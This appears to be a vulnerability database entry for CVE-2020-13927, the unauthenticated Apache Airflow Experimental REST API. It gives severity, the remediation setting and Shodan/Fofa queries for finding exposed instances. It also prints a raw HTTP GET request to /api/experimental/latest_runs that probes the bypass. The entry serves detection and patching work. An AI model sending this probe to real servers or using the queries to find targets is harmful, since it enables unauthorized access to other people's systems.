🔙 목록으로 돌아가기

CVE-2020-13927: Airflow Experimental <1.10.11 - REST API Auth Bypass

TitleAirflow Experimental <1.10.11 - REST API Auth Bypass
Authorpdteam
SeverityCritical
ImpactAllows unauthorized access to Airflow Experimental REST API
RemediationFrom Airflow 1.10.11 forward, the default has been changed to deny all requests by default. Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references.
CVSS Score9.8
EPSS Score0.94186
CVE IDCVE-2020-13927
CWE IDCWE-1188
Shodan Querytitle:"Airflow - DAGs" || http.html:"Apache Airflow"http.title:"airflow - dags" || http.html:"apache airflow"http.title:"sign in - airflow"product:"redis"
Fofa Querytitle="sign in - airflow"apache airflowtitle="airflow - dags" || http.html:"apache airflow"
Tags cve2020 cve packetstorm apache airflow unauth auth-bypass kev vkev vuln

🔍 Vulnerability Description

Airflow’s Experimental API prior 1.10.11 allows all API requests without authentication.

🌐 HTTP Request

GET /api/experimental/latest_runs HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/13.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-13927.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-13927.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A